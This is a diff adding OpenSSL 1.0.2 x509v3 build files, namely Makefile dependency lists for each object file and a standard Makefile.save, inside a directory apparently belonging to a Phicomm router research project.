+v3_pmaps.o: ../cryptlib.h v3_pmaps.c
+v3_prn.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_prn.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_prn.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_prn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_prn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_prn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_prn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_prn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_prn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_prn.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_prn.o: ../cryptlib.h v3_prn.c
+v3_purp.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_purp.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_purp.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_purp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_purp.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_purp.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_purp.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_purp.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_purp.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_purp.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_purp.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_purp.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_purp.c
+v3_scts.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_scts.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_scts.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_scts.o: ../../include/openssl/dsa.h ../../include/openssl/dtls1.h
+v3_scts.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_scts.o: ../../include/openssl/evp.h ../../include/openssl/hmac.h
+v3_scts.o: ../../include/openssl/kssl.h ../../include/openssl/lhash.h
+v3_scts.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_scts.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_scts.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+v3_scts.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+v3_scts.o: ../../include/openssl/pqueue.h ../../include/openssl/rsa.h
+v3_scts.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_scts.o: ../../include/openssl/srtp.h ../../include/openssl/ssl.h
+v3_scts.o: ../../include/openssl/ssl2.h ../../include/openssl/ssl23.h
+v3_scts.o: ../../include/openssl/ssl3.h ../../include/openssl/stack.h
+v3_scts.o: ../../include/openssl/symhacks.h ../../include/openssl/tls1.h
+v3_scts.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_scts.o: ../../include/openssl/x509v3.h ../../ssl/ssl_locl.h ../cryptlib.h
+v3_scts.o: v3_scts.c
+v3_skey.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_skey.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_skey.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_skey.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_skey.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_skey.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_skey.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_skey.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_skey.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_skey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_skey.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_skey.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_skey.c
+v3_sxnet.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_sxnet.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_sxnet.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_sxnet.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_sxnet.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_sxnet.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_sxnet.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_sxnet.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_sxnet.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_sxnet.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_sxnet.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_sxnet.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_sxnet.o: ../cryptlib.h v3_sxnet.c
+v3_utl.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_utl.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+v3_utl.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_utl.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_utl.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_utl.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_utl.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_utl.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_utl.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_utl.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_utl.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_utl.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_utl.c
+v3err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3err.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3err.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3err.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3err.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3err.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3err.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3err.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3err.o: v3err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/Makefile.save
new file mode 100644
index 0000000..6c3ecaf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/Makefile.save
@@ -0,0 +1,558 @@
+#
+# OpenSSL/crypto/x509v3/Makefile
+#
+
+DIR=	x509v3
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=v3nametest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	v3_bcons.c v3_bitst.c v3_conf.c v3_extku.c v3_ia5.c v3_lib.c \
+v3_prn.c v3_utl.c v3err.c v3_genn.c v3_alt.c v3_skey.c v3_akey.c v3_pku.c \
+v3_int.c v3_enum.c v3_sxnet.c v3_cpols.c v3_crld.c v3_purp.c v3_info.c \
+v3_ocsp.c v3_akeya.c v3_pmaps.c v3_pcons.c v3_ncons.c v3_pcia.c v3_pci.c \
+pcy_cache.c pcy_node.c pcy_data.c pcy_map.c pcy_tree.c pcy_lib.c \
+v3_asid.c v3_addr.c v3_scts.c
+LIBOBJ= v3_bcons.o v3_bitst.o v3_conf.o v3_extku.o v3_ia5.o v3_lib.o \
+v3_prn.o v3_utl.o v3err.o v3_genn.o v3_alt.o v3_skey.o v3_akey.o v3_pku.o \
+v3_int.o v3_enum.o v3_sxnet.o v3_cpols.o v3_crld.o v3_purp.o v3_info.o \
+v3_ocsp.o v3_akeya.o v3_pmaps.o v3_pcons.o v3_ncons.o v3_pcia.o v3_pci.o \
+pcy_cache.o pcy_node.o pcy_data.o pcy_map.o pcy_tree.o pcy_lib.o \
+v3_asid.o v3_addr.o v3_scts.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= x509v3.h
+HEADER=	$(EXHEADER) pcy_int.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+pcy_cache.o: ../../e_os.h ../../include/openssl/asn1.h
+pcy_cache.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pcy_cache.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pcy_cache.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pcy_cache.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_cache.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_cache.o: ../../include/openssl/opensslconf.h
+pcy_cache.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pcy_cache.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pcy_cache.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pcy_cache.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pcy_cache.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+pcy_cache.o: ../cryptlib.h pcy_cache.c pcy_int.h
+pcy_data.o: ../../e_os.h ../../include/openssl/asn1.h
+pcy_data.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pcy_data.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pcy_data.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pcy_data.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_data.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_data.o: ../../include/openssl/opensslconf.h
+pcy_data.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pcy_data.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pcy_data.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pcy_data.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pcy_data.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+pcy_data.o: ../cryptlib.h pcy_data.c pcy_int.h
+pcy_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+pcy_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pcy_lib.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pcy_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pcy_lib.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+pcy_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+pcy_lib.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pcy_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pcy_lib.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pcy_lib.o: ../../include/openssl/x509v3.h ../cryptlib.h pcy_int.h pcy_lib.c
+pcy_map.o: ../../e_os.h ../../include/openssl/asn1.h
+pcy_map.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pcy_map.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pcy_map.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pcy_map.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_map.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_map.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+pcy_map.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+pcy_map.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pcy_map.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pcy_map.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pcy_map.o: ../../include/openssl/x509v3.h ../cryptlib.h pcy_int.h pcy_map.c
+pcy_node.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+pcy_node.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+pcy_node.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pcy_node.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_node.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_node.o: ../../include/openssl/opensslconf.h
+pcy_node.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pcy_node.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pcy_node.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pcy_node.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pcy_node.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+pcy_node.o: pcy_int.h pcy_node.c
+pcy_tree.o: ../../e_os.h ../../include/openssl/asn1.h
+pcy_tree.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pcy_tree.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pcy_tree.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pcy_tree.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pcy_tree.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pcy_tree.o: ../../include/openssl/opensslconf.h
+pcy_tree.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pcy_tree.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pcy_tree.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pcy_tree.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pcy_tree.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+pcy_tree.o: ../cryptlib.h pcy_int.h pcy_tree.c
+v3_addr.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_addr.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_addr.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_addr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_addr.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_addr.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_addr.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_addr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_addr.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_addr.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_addr.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_addr.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_addr.o: ../cryptlib.h v3_addr.c
+v3_akey.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_akey.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_akey.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_akey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_akey.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_akey.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_akey.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_akey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_akey.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_akey.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_akey.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_akey.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_akey.o: ../cryptlib.h v3_akey.c
+v3_akeya.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_akeya.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_akeya.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_akeya.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_akeya.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_akeya.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_akeya.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_akeya.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_akeya.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_akeya.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_akeya.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_akeya.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_akeya.o: ../cryptlib.h v3_akeya.c
+v3_alt.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_alt.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_alt.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_alt.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_alt.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_alt.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_alt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_alt.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_alt.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_alt.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_alt.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_alt.o: ../cryptlib.h v3_alt.c
+v3_asid.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_asid.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_asid.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+v3_asid.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_asid.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_asid.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_asid.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_asid.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_asid.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_asid.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_asid.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_asid.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_asid.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_asid.c
+v3_bcons.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_bcons.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_bcons.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_bcons.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_bcons.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_bcons.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_bcons.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_bcons.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_bcons.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_bcons.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_bcons.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_bcons.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_bcons.o: ../cryptlib.h v3_bcons.c
+v3_bitst.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_bitst.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_bitst.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_bitst.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_bitst.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_bitst.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_bitst.o: ../../include/openssl/opensslconf.h
+v3_bitst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_bitst.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_bitst.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_bitst.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_bitst.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_bitst.o: ../cryptlib.h v3_bitst.c
+v3_conf.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_conf.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_conf.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_conf.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_conf.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_conf.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_conf.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_conf.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_conf.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_conf.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_conf.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_conf.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_conf.c
+v3_cpols.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_cpols.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_cpols.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_cpols.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_cpols.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_cpols.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_cpols.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_cpols.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_cpols.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_cpols.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_cpols.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_cpols.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_cpols.o: ../cryptlib.h pcy_int.h v3_cpols.c
+v3_crld.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_crld.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_crld.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_crld.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_crld.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_crld.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_crld.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_crld.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_crld.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_crld.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_crld.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_crld.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_crld.o: ../cryptlib.h v3_crld.c
+v3_enum.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_enum.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_enum.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_enum.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_enum.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_enum.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_enum.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_enum.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_enum.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_enum.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_enum.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_enum.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_enum.c
+v3_extku.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_extku.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_extku.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_extku.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_extku.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_extku.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_extku.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_extku.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_extku.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_extku.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_extku.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_extku.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_extku.o: ../cryptlib.h v3_extku.c
+v3_genn.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_genn.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_genn.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_genn.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_genn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_genn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_genn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_genn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_genn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_genn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_genn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_genn.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_genn.o: ../cryptlib.h v3_genn.c
+v3_ia5.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_ia5.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_ia5.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_ia5.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_ia5.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_ia5.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_ia5.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_ia5.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_ia5.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_ia5.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
